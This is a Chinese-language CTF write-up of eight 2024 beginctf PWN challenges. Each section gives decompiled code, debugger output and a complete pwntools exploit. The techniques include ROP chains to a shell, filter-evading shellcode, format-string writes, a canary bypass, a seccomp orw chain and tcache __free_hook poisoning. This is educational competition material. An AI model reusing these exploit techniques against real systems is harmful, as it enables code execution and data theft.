2024年beginctf-PWN

one_byte

检查保护，开了地址随机化，没开canary

[*] '/home/starrysky/beginctf/one_byte/pwn'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

查看程序，发现可以溢出一字节，也对应了题目的one-byte，程序会打开flag文件并且输出一字节，要读出flag必然需要printf，所以覆盖返回地址低位到printf处即可

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[8]; // [rsp+7h] [rbp-9h] BYREF
  char buf; // [rsp+Fh] [rbp-1h] BYREF

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  puts("Welcome to beginctf!");
  open("flag", 0);
  read(3, &buf, 1uLL);
  printf("Here is your gift: %c\n", (unsigned int)buf);
  puts("Are you satisfied with the result?");
  read(0, v4, 0x12uLL);
  return 0;
}

exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('101.32.220.189',31141)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

flag = ''

for i in range(80):
    r.recvuntil('Here is your gift: ')
    flag += r.recv(1).decode()
    r.sendafter(b'with the result?', b'a' * 0x11 + b'\x6d')

li(flag)

r.interactive()

gift_rop

打开程序，发现是静态编译的c，所以可以通过ropgadget直接获取ropchain，指令

1	ROPgadget --binary ./pwn --ropchain

执行指令之后会返回很多gadget地址以及一段现成的ropchain，如下

from struct import pack

# Padding goes here
p = b''

p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043d1d0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000047f20b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
	p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x000000000043d1d0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471270) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401ce4) # syscall

这段ropchain是控制返回地址之后执行的内容，由于python语法格式，要把p +=前面的多余空格去掉，这段代码发过去会报错，因为最后一段重复执行add rax，1，长度太长了，所以就需要从返回的gadget中找到可替代的gadget，格式就是将gadget地址放在Q后面。execve的系统调用号在64位中是59，所以最后一段的目的就是把rax加到59，但是返回的gadget太多，可以用grep筛选一下

1	ROPgadget --binary ./pwn --ropchain \| grep 'rax'

找到以下两条gadget，用这两条代替add rax， 1凑到59

1 2	0x0000000000471267 : add rax, 2 ; ret 0x0000000000471280 : add rax, 3 ; ret

exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189', 32151)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

'''
bin_sh = 0x4C50F0
pop_rdi_ret = 0x0000000000401f2f
p = p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
'''

from struct import pack

# Padding goes here
p = b''

p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000448077) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043d1d0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a4f5) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401f2f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409f9e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000047f20b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x000000000043d1d0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471280) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000471267) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401ce4) # syscall

r.sendlineafter(b'This is a fake(real) checkin problem.', b'a' * 0x28 + p)

r.interactive()

由于程序中有close

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[32]; // [rsp+0h] [rbp-20h] BYREF

  init(argc, argv, envp);
  puts((__int64)"Welcome to beginCTF!");
  puts((__int64)"This is a fake(real) checkin problem.");
  read(0LL, v4, 512LL);
  close(1LL);
  close(2LL);
  return 0;
}

所以getshell以后还需要重定向标准输出，输入exec 1>&0即可

exec

代替shell执行命令，区别是shell执行完之后会回到shell，而exec会直接退出。

文件重定向，也就是exec 1>&0这样将文件描述符为1的文件重定向到0上

标准输出(close(1))和标准错误(close(2))，有shell但获得不了输出,可以通过exec 1>&0重定向

unhappy

这题就是写shellcode，但是shellcode里不能含有HAPYhapy

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *addr; // [rsp+10h] [rbp-10h]

  addr = mmap((void *)0xFFF00000LL, 0x1000uLL, 7, 34, -1, 0LL);
  if ( addr == (void *)-1LL )
  {
    perror("mmap failed");
    return 1;
  }
  else
  {
    read(0, addr, 0x100uLL);
    check(addr);
    ((void (*)(void))addr)();
    if ( munmap(addr, 0x1000uLL) == -1 )
    {
      perror("munmap failed");
      return 1;
    }
    else
    {
      return 0;
    }
  }
}
__int64 __fastcall check(__int64 a1)
{
  __int64 result; // rax
  char v2; // [rsp+1Bh] [rbp-5h]
  int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 0; i <= 255; ++i )
  {
    result = *(unsigned __int8 *)(i + a1);
    v2 = *(_BYTE *)(i + a1);
    if ( v2 == 'h' || v2 == 'a' || v2 == 'p' || v2 == 'y' || v2 == 'H' || v2 == 'A' || v2 == 'P' || v2 == 'Y' )
      exit(-1);
  }
  return result;
}

要在限制下写的话可以利用sub和add去凑出要实现的代码，比如add rdi,0x61，可以写成add rdi， 0x60 add rdi，0x1，但是这题有一个简便的方法就是输入shellcode来执行read，通过syscall调用的read就没有了check的限制，但是第二次输入需要先sleep停顿一下

先试着用execve(’/bin/sh’, 0,0)来getshell

add edi, 0x30
mov dword ptr [edi], 0x6e69622f
add edi, 0x4
mov dword ptr [edi], 0x58732f2f
add dword ptr [edi], 0x10000000
sub edi,0x4
mov esi, 0
mov edx, 0
mov eax,59
syscall

打到远程会发现没有cat flag的权限，但是unhappy有rws权限，也就是执行unhappy有root权限，所以把shellcode改成orw即可，直接write会报错，这里也学习到了一个知识点：

ssize_t sendfile(int out_fd,int in_fd,off_t* offset,size_t count); sendfile函数在两个文件描述符之间直接传递数据（完全在内核中操作），从而避免了内核缓冲区和用户缓冲区之间的数据拷贝，效率很高，这被称为零拷贝

最终exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189',31276)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = asm(shellcraft.read(0, 'rsi', 0x300))
r.sendline(shellcode)
shellcode = b'\x90' * len(shellcode) + asm(shellcraft.open('./flag', 'O_RDWR', 0))
shellcode += asm(shellcraft.sendfile(1,3,0,0x50))
sleep(10)
r.sendline(shellcode)

r.interactive()

ezpwn

test command不能用cat和sh（官方wp指出test command对指令过滤不严，也可以利用test command），test filename不能输入flag，teat data功能是输入一个index，向数组该index处输入一个字符，而程序中有shell函数，所以调试一下计算返回地址到该数组之间的距离作为index，把返回地址地位改成shell函数低位即可，需要注意的是输入格式，行末要加回车不然会覆盖成回车

unsigned __int64 main_loop()
{
  ...
        case 1:
          puts("Please input index.");
          __isoc99_scanf("%d", &v2);
          puts("please input value");
          v1 = getchar();
          getchar();
          s[v2] = v1;
          break;
    ...
}

exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189', 31180)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

gift = 0x1849

r.sendlineafter(b'Input your choice.', b'1\n')
r.sendlineafter(b'Please input index.', str(0x228) + '\n')
r.sendlineafter(b'please input value', b'\x51')
r.sendlineafter(b'Input your choice.', b'4')

r.interactive()

no_money

格式化字符串，但是禁用$，一般用$定位，本题中也学到一个知识点：’%p’ * n + ‘%hn’ = ‘%n$hn’,利用这一点，先泄露程序基址加上shell地址最后改返回地址低位为shell地址即可

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189', 31645)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.sendlineafter(b'Your payload:', b'%p-%p-%p-%p-%p-%p')

for i in range(6):
    r.recvuntil(b'0x')
code = int(r.recv(12), 16) - 0x40
target = 0x404C + code

p = b'%255c' + b'%p' * 16 + b'%hhn'
p = p.ljust(0x40, b'a') + p64(target) * 0x60
r.sendlineafter(b'payload:', p)

r.interactive()

cat

开了canary但是没开pie

checksec pwn        
[*] '/home/starrysky/beginctf/cat/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序中有后门函数，main中向bss段两个变量输入数据，vul中向栈中输入数据

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  setbuf(stderr, 0LL);
  puts("read:");
  read(0, read1, 0x100uLL);
  puts("read:");
  read(0, read2, 0x100uLL);
  vul(read1, read2);
  return 0;
}

unsigned __int64 __fastcall vul(const char *read1, const char *read2)
{
  __int64 read3[2]; // [rsp+10h] [rbp-40h] BYREF
  char dest[8]; // [rsp+20h] [rbp-30h] BYREF
  __int64 v5; // [rsp+28h] [rbp-28h]
  char v6[8]; // [rsp+30h] [rbp-20h] BYREF
  __int64 v7; // [rsp+38h] [rbp-18h]
  unsigned __int64 v8; // [rsp+48h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  read3[0] = 0LL;
  read3[1] = 0LL;
  *(_QWORD *)dest = 0LL;
  v5 = 0LL;
  *(_QWORD *)v6 = 0LL;
  v7 = 0LL;
  puts("read:");
  read(0, read3, 0x100uLL);
  strcat(dest, read1);
  strcpy(v6, read2);
  return v8 - __readfsqword(0x28u);
}

重点就是绕过canary，这里学到一个知识点：strcat会从第一个\x00开始拼接，strcpy会在末尾写\x00，查看栈中数据

pwndbg> stack
00:0000│ rsp     0x7fffffffde00 —▸ 0x4041a0 (cx) ◂— 0xa616161 /* 'aaa\n' */
01:0008│         0x7fffffffde08 —▸ 0x4040a0 (bx) ◂— 0xa616161 /* 'aaa\n' */
02:0010│         0x7fffffffde10 ◂— 0xa616161 /* 'aaa\n' */
03:0018│         0x7fffffffde18 ◂— 0x0
... ↓            4 skipped
pwndbg> 
08:0040│     0x7fffffffde40 —▸ 0x7fffffffdf78 —▸ 0x7fffffffe311 ◂— '/home/starrysky/beginctf/cat/pwn'
09:0048│     0x7fffffffde48 ◂— 0x40934e0df3212f00
0a:0050│ rbp 0x7fffffffde50 —▸ 0x7fffffffde60 ◂— 0x1
0b:0058│     0x7fffffffde58 —▸ 0x401381 (main+183) ◂— mov eax, 0

利用：read3覆盖掉dest到canary末尾的\x00，strcat拼接会从canary之后开始拼接，最后利用strcpy将canary末尾恢复成\x00

exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')  #32位arch=‘i386’

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189', 30188)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

cat = 0x4011FE
r.sendafter(b'read:', b'a' * 2 + p64(cat))
r.sendafter(b'read:', b'B' * 0x18)
r.sendafter(b'read:', b'C' * 0x39)

r.interactive()

aladdin

非常…痛苦的一题，本地和远程的偏移竟然不一样…用不了ogg，bss段上的chance=4，只能利用三次，所以这三次要先把chance改掉

while ( --chance )
  {
    printf("your %d wish:\n", (unsigned int)chance);
    memset(wish, 0, sizeof(wish));
    read(0, wish, 0x100uLL);
    if ( strstr(wish, "one more wish") )
    {
      puts("no way!");
      break;
    }
    printf(wish);
  }
  printf("The wonderful lamp is broken");

查看栈结构，利用这几个地址来泄露一些需要的值：code_base、stack、libc_base

pwndbg> stack
00:0000│ rsp 0x7fffffffdd80 ◂— 0x7ffff7fc0005
01:0008│     0x7fffffffdd88 —▸ 0x7fffffffdd90 ◂— 0x20 /* ' ' */
02:0010│     0x7fffffffdd90 ◂— 0x20 /* ' ' */
03:0018│     0x7fffffffdd98 ◂— 0x3b00010015
04:0020│     0x7fffffffdda0 ◂— 0x10035 /* '5' */
05:0028│     0x7fffffffdda8 ◂— 0x5000000000006
06:0030│     0x7fffffffddb0 ◂— 0x7fff000000000006
07:0038│     0x7fffffffddb8 ◂— 0x163fe5f2dcc3a00
pwndbg> 
08:0040│ rbp 0x7fffffffddc0 ◂— 0x1
09:0048│     0x7fffffffddc8 —▸ 0x7ffff7dbcd90 ◂— mov edi, eax
0a:0050│     0x7fffffffddd0 ◂— 0x0
0b:0058│     0x7fffffffddd8 —▸ 0x555555555229 (main) ◂— endbr64 
0c:0060│     0x7fffffffdde0 ◂— 0x1ffffdec0
0d:0068│     0x7fffffffdde8 —▸ 0x7fffffffded8 —▸ 0x7fffffffe260 ◂— '/home/starrysky/game_2024/beginctf/aladdin/pwn'
0e:0070│     0x7fffffffddf0 ◂— 0x0
0f:0078│     0x7fffffffddf8 ◂— 0xa251b96a3bc40170
pwndbg> 
10:0080│  0x7fffffffde00 —▸ 0x7fffffffded8 —▸ 0x7fffffffe260 ◂— '/home/starrysky/game_2024/beginctf/aladdin/pwn'
11:0088│  0x7fffffffde08 —▸ 0x555555555229 (main) ◂— endbr64 
12:0090│  0x7fffffffde10 —▸ 0x555555557d88 (__do_global_dtors_aux_fini_array_entry) —▸ 0x5555555551e0 (__do_global_dtors_aux) ◂— endbr64 
13:0098│  0x7fffffffde18 —▸ 0x7ffff7ffd040 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
14:00a0│  0x7fffffffde20 ◂— 0x5dae469580660170
15:00a8│  0x7fffffffde28 ◂— 0x5dae56dda14e0170
16:00b0│  0x7fffffffde30 ◂— 0x7fff00000000
17:00b8│  0x7fffffffde38 ◂— 0x0
pwndbg> 
18:00c0│  0x7fffffffde40 ◂— 0x0
... ↓     2 skipped
1b:00d8│  0x7fffffffde58 ◂— 0x163fe5f2dcc3a00
1c:00e0│  0x7fffffffde60 ◂— 0x0
1d:00e8│  0x7fffffffde68 —▸ 0x7ffff7dbce40 (__libc_start_main+128) ◂— mov r15, qword ptr [rip + 0x1ef159]
1e:00f0│  0x7fffffffde70 —▸ 0x7fffffffdee8 —▸ 0x7fffffffe28f ◂— 'GJS_DEBUG_TOPICS=JS ERROR;JS LOG'
1f:00f8│  0x7fffffffde78 —▸ 0x555555557d88 (__do_global_dtors_aux_fini_array_entry) —▸ 0x5555555551e0 (__do_global_dtors_aux) ◂— endbr64 
pwndbg> fmtarg 0x7fffffffddd8
The index of format argument : 17 ("\%16$p")
pwndbg> fmtarg 0x7fffffffde00
The index of format argument : 22 ("\%21$p")
pwndbg> fmtarg 0x7fffffffde68
The index of format argument : 35 ("\%34$p")

输入的wish是bss段的，也就是非栈上的格式化字符串，需要用栈作为跳板去改其他地方的数据，本题的利用思路就是第一次输入用于泄露地址，第二次输入用来设置跳板，第三次输入用来改printf返回地址到val中的输入，继续输入改chance值，但也不能改太大，用到的链如下

0x7fffffffdde8 —▸ 0x7fffffffded8 —▸ 0x7fffffffe260 ◂— '/home/starrysky/game_2024/beginctf/aladdin/pwn'
0x7fffffffde70 —▸ 0x7fffffffdee8 —▸ 0x7fffffffe28f ◂— 'GJS_DEBUG_TOPICS=JS ERROR;JS LOG'

pwndbg> fmtarg 0x7fffffffdde8
The index of format argument : 19 ("\%18$p")
pwndbg> fmtarg 0x7fffffffde70
The index of format argument : 36 ("\%35$p")

修改成功后就可以无限利用fmt，但这题有沙箱，只能orw

aladdin  seccomp-tools dump ./pwn                 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0003
 0002: 0x35 0x01 0x00 0x00000000  if (A >= 0x0) goto 0004
 0003: 0x06 0x00 0x00 0x00050000  return ERRNO(0)
 0004: 0x06 0x00 0x00 0x7fff0000  return ALLOW

但是把栈直接改orw比较麻烦，所以可以在返回地址先构造read，然后用read读rop链实现orw

exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

#context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('101.32.220.189', 30879)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def pay(target, value):
    tar = target & 0xffff
    for i in range(3):
        val = value & 0xffff
        value = value >> 16
        p = '%' + str(tar) + 'c%36$hn'
        r.sendafter(b'wish:', p)
        sleep(1)
        p = '%' + str(val) + 'c%52$hn'
        r.sendafter(b'wish:', p)
        sleep(1)
        tar += 0x2

p = b'%17$p%22$p%35$p'
r.sendafter(b'wish:', p)

r.recvuntil(b'0x')
code = int(r.recv(12), 16) - 0x1229

r.recvuntil(b'0x')
stack = int(r.recv(12), 16)

r.recvuntil(b'0x')
libc_base = int(r.recv(12), 16) - 0x29e40
libc = ELF('./2.35/libc.so.6')

target = (stack - 0x160) & 0xffff
target1 = (stack - 0xd0) & 0xffff

if target1 > target:
    p = '%' + str(target) + 'c%19$hn' + '%' + str(target1 - target) + 'c%36$hn'
else:
    p = '%' + str(target) + 'c%19$hn' + '%' + str(0x10000 + target1 - target) + 'c%36$hn'
r.sendafter(b'wish:', p)

addr = (0x137F + code) & 0xffff
chance = (0x4010 + code) & 0xffff

if chance > addr:
    p = '%' + str(addr) + 'c%49$hn' + '%' + str(chance - addr) + 'c%52$hn'
else:
    p = '%' + str(addr) + 'c%49$hn' + '%' + str(0x10000 + chance - addr) + 'c%52$hn'
sleep(1)
r.sendafter(b'wish:', p)

p = '%' + str(0x30) + 'c%23$hn'
sleep(1)
r.sendline(p)

pop_rdi_ret = 0x000000000002a3e5 + libc_base
pop_rsi_ret = 0x000000000002be51 + libc_base
pop_rdx_ret = 0x00000000000796a2 + libc_base

stack -= 0x10
ret = stack - 0x110 + 0x38 + 0x10
read = libc.sym['read'] + libc_base

pay(stack - 0x100, pop_rdi_ret)
pay(stack - 0x100 + 0x10, pop_rsi_ret)
pay(stack - 0x100 + 0x18, ret)
pay(stack - 0x100 + 0x20, pop_rdx_ret)
pay(stack - 0x100 + 0x28, 0x300)
pay(stack - 0x100 + 0x30, read)

p = '%' + str((stack - 0x100 + 0x30 + 6) & 0xffff) + 'c%36$hn'
r.sendafter(b'wish:', p)
sleep(1)
p = '%' + str(0x0) + 'c%52$hn'
r.sendafter(b'wish:', p)
sleep(1)
p = '%' + str((stack - 0x100 + 0x30 + 5) & 0xffff) + 'c%36$hn'
r.sendafter(b'wish:', p)
sleep(1)
p = '%' + str(0x7f) + 'c%52$hn'
r.sendafter(b'wish:', p)
sleep(1)

for i in range(7):
    r.sendafter(b'wish:', b'a')

open_addr = libc.sym['open'] + libc_base
write_addr = libc.sym['write'] + libc_base
pop_rax_ret = 0x0000000000045eb0 + libc_base
syscall = 0x0000000000029db4 + libc_base
orw_rop_addr = stack - 0x100 + 0x18 + 0x10

orw_rop  = p64(pop_rdi_ret) + p64(orw_rop_addr+0xb8) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret) + p64(0) + p64(open_addr)
orw_rop += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(orw_rop_addr+0xb8) + p64(pop_rdx_ret) + p64(0x100) + p64(read)
orw_rop += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(orw_rop_addr+0xb8) + p64(pop_rdx_ret) + p64(0x100) + p64(write_addr)
orw_rop += b'flag'.ljust(0x10,b'\x00')
r.sendafter(b'broken', orw_rop)

r.interactive()

zeheap

存在uaf漏洞，但是edit和show受到mark的限制

unsigned __int64 delete()
{
  unsigned int index; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("num:");
  __isoc99_scanf("%d", &index);
  if ( index <= 0xF )
  {
    free(heap_ptr[index]);
    mark[index] = 0;
  }
  return __readfsqword(0x28u) ^ v2;
}

将unsorted bin中的堆重复释放到tcache中，就可以利用这个堆泄露libc地址，并且将tcache中的堆和unsorted bin中的堆都申请出来就可以造成堆块复用，其中一个释放到tcache再用另一个改fd为free_hook最后申请出来改成system

exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('node4.buuoj.cn', 26870)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def add(num):
    r.sendlineafter(b'choose:', b'1')
    r.sendlineafter(b'num:', str(num))

def edit(num, content):
    r.sendlineafter(b'choose:', b'2')
    r.sendlineafter(b'num:', str(num))
    r.sendlineafter(b'read:', content)

def show(num):
    r.sendlineafter(b'choose:', b'3')
    r.sendlineafter(b'num:', str(num))

def delete(num):
    r.sendlineafter(b'choose:', b'4')
    r.sendlineafter(b'num:', str(num))

for i in range(10):
    add(i)
for i in range(9):
    delete(i)

add(10)
delete(8)

for i in range(8):
    add(i)

show(0)

libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x1ecbe0
libc = ELF('./libc-2.31.so')
system = libc.sym['system'] + libc_base
free_hook = libc_base + libc.sym['__free_hook']

add(8)

delete(1)
delete(8)

edit(0, p64(free_hook))

add(11)
edit(11, b'/bin/sh\x00')

add(12)
edit(12, p64(system))

delete(11)

r.interactive()